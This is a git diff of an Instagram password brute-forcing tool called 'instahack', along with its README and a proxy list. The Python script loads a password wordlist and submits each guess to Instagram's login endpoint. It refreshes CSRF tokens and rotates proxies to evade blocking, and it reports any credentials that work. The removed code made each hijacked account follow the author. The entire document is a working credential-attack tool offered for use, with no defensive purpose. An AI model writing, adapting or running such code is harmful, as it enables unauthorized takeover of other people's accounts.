diff --git a/README.md b/README.md index 9078ccc..9de4ca1 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,6 @@ # instahack -Hack instagram bruteforce +[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=ARVABYAUX3NPC) + +###### [*] Hack instagram accounts use bruteforce +###### [*] for more proxy - go to https://www.torvpn.com/en/proxy-list ![alt tag](https://raw.githubusercontent.com/avramit/instahack/master/screenshot.jpg) diff --git a/hackinsta.py b/hackinsta.py index 128bb1e..a772544 100644 --- a/hackinsta.py +++ b/hackinsta.py @@ -1,110 +1,168 @@ + +''' +TODO LIST: + Fix and make proxy function better + Sort code again + Add help function to all "Yes/no" questions + Add help function to "Press enter to exit input" +''' import requests import json import time import os - -filename = 'pass.txt' -if os.path.isfile(filename): - with open(filename) as f: - passwords = f.read().splitlines() - if (len(passwords) > 0): - print ('%s Passwords loads successfully' % len(passwords)) -else: - print ('Please create passwords file (pass.txt)') - exit() - - - - -def userExists(username): - r = requests.get('https://www.instagram.com/%s/?__a=1' % username) - if (r.status_code == 404): - print ('User not found') - return False - elif (r.status_code == 200): - followdata = json.loads(r.text) - fUserID = followdata['user']['id'] - return {'username':username,'id':fUserID} - - -def Login(username,password): - sess = requests.Session() - sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '', 's_network' : '', 'ds_user_id' : ''}) - sess.headers.update({ - 'UserAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', - 'x-instagram-ajax':'1', - 'X-Requested-With': 'XMLHttpRequest', - 'origin': 'https://www.instagram.com', - 'ContentType' : 'application/x-www-form-urlencoded', - 'Connection': 'keep-alive', - 'Accept': '*/*', - 'Referer': 'https://www.instagram.com', - 'authority': 'www.instagram.com', - 'Host' : 'www.instagram.com', - 'Accept-Language' : 'ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4', - 'Accept-Encoding' : 'gzip, deflate' - }) - - #first time -> to get csrftoken - r = sess.get('https://www.instagram.com/') - sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']}) - - data = {'username':username, 'password':password} - r = sess.post('https://www.instagram.com/accounts/login/ajax/', data=data, allow_redirects=True) - token = r.cookies.get_dict()['csrftoken'] - sess.headers.update({'X-CSRFToken' : token}) - #parse response - data = json.loads(r.text) - if (data['status'] == 'fail'): - print (data['message']) - return False - - if (data['authenticated'] == True): - return sess #if we want to keep use session +import random +import sys + +#Help function +def Input(text): + value = '' + if sys.version_info.major > 2: + value = input(text) else: - print ('Password incorrect [%s]' % password) - return False + value = raw_input(text) + return str(value) + +#The main class +class Instabrute(): + def __init__(self, username, passwordsFile='pass.txt'): + self.username = username + self.CurrentProxy = '' + self.UsedProxys = [] + self.passwordsFile = passwordsFile + + #Check if passwords file exists + self.loadPasswords() + #Check if username exists + self.IsUserExists() + + + UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper() + if (UsePorxy == 'Y' or UsePorxy == 'YES'): + self.randomProxy() + + + #Check if password file exists and check if he contain passwords + def loadPasswords(self): + if os.path.isfile(self.passwordsFile): + with open(self.passwordsFile) as f: + self.passwords = f.read().splitlines() + passwordsNumber = len(self.passwords) + if (passwordsNumber > 0): + print ('[*] %s Passwords loads successfully' % passwordsNumber) + else: + print('Password file are empty, Please add passwords to it.') + Input('[*] Press enter to exit') + exit() + else: + print ('Please create passwords file named "%s"' % self.passwordsFile) + Input('[*] Press enter to exit') + exit() + #Choose random proxy from proxys file + def randomProxy(self): + plist = open('proxy.txt').read().splitlines() + proxy = random.choice(plist) + + if not proxy in self.UsedProxys: + self.CurrentProxy = proxy + self.UsedProxys.append(proxy) + try: + print('') + print('[*] Check new ip...') + print ('[*] Your public ip: %s' % requests.get('http://myexternalip.com/raw', proxies={ "http": proxy, "https": proxy },timeout=10.0).text) + except Exception as e: + print ('[*] Can\'t reach proxy "%s"' % proxy) + print('') + + + #Check if username exists in instagram server + def IsUserExists(self): + r = requests.get('https://www.instagram.com/%s/?__a=1' % self.username) + if (r.status_code == 404): + print ('[*] User named "%s" not found' % username) + Input('[*] Press enter to exit') + exit() + elif (r.status_code == 200): + return True + + #Try to login with password + def Login(self, password): + sess = requests.Session() + + if len(self.CurrentProxy) > 0: + sess.proxies = { "http": self.CurrentProxy, "https": self.CurrentProxy } + + #build requests headers + sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '', 's_network' : '', 'ds_user_id' : ''}) + sess.headers.update({ + 'UserAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', + 'x-instagram-ajax':'1', + 'X-Requested-With': 'XMLHttpRequest', + 'origin': 'https://www.instagram.com', + 'ContentType' : 'application/x-www-form-urlencoded', + 'Connection': 'keep-alive', + 'Accept': '*/*', + 'Referer': 'https://www.instagram.com', + 'authority': 'www.instagram.com', + 'Host' : 'www.instagram.com', + 'Accept-Language' : 'en-US;q=0.6,en;q=0.4', + 'Accept-Encoding' : 'gzip, deflate' + }) + + #Update token after enter to the site + r = sess.get('https://www.instagram.com/') + sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']}) + + #Update token after login to the site + r = sess.post('https://www.instagram.com/accounts/login/ajax/', data={'username':self.username, 'password':password}, allow_redirects=True) + sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']}) + + #parse response + data = json.loads(r.text) + if (data['status'] == 'fail'): + print (data['message']) + + UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper() + if (UsePorxy == 'Y' or UsePorxy == 'YES'): + print ('[$] Try to use proxy after fail.') + randomProxy() #Check that, may contain bugs + return False + + #return session if password is correct + if (data['authenticated'] == True): + return sess + else: + return False -def follow(sess, username): - username = userExists(username) - if (username == False): - return - else: - userID = username['id'] - followReq = sess.post('https://www.instagram.com/web/friendships/%s/follow/' % userID) - print (followReq.text) -username = str(input('Please enter a username: ')) -username = userExists(username) -if (username == False): - exit() -else: - username = username['username'] +instabrute = Instabrute(Input('Please enter a username: ')) -delayLoop = int(input('Please add delay between the passwords (in seconds): ')) +try: + delayLoop = int(Input('[*] Please add delay between the bruteforce action (in seconds): ')) +except Exception as e: + print ('[*] Error, software use the defult value "4"') + delayLoop = 4 +print ('') -for i in range(len(passwords)): - password = passwords[i] - sess = Login(username,password) - if (sess): - print ('Login success %s' % [username,password]) - #because i am cool - follow(sess,'avr_amit') +for password in instabrute.passwords: + sess = instabrute.Login(password) + if sess: + print ('[*] Login success %s' % [instabrute.username,password]) + else: + print ('[*] Password incorrect [%s]' % password) try: time.sleep(delayLoop) except KeyboardInterrupt: - an = str(input('Type y/n to exit: ')) - if (an == 'y'): + WantToExit = str(Input('Type y/n to exit: ')).upper() + if (WantToExit == 'Y' or WantToExit == 'YES'): exit() else: continue - diff --git a/proxy.txt b/proxy.txt new file mode 100644 index 0000000..03e5c29 --- /dev/null +++ b/proxy.txt @@ -0,0 +1,2 @@ +51.15.46.137 +149.56.81.59 diff --git a/screenshot.jpg b/screenshot.jpg index a7bf4f5..89ca566 100644 Binary files a/screenshot.jpg and b/screenshot.jpg differ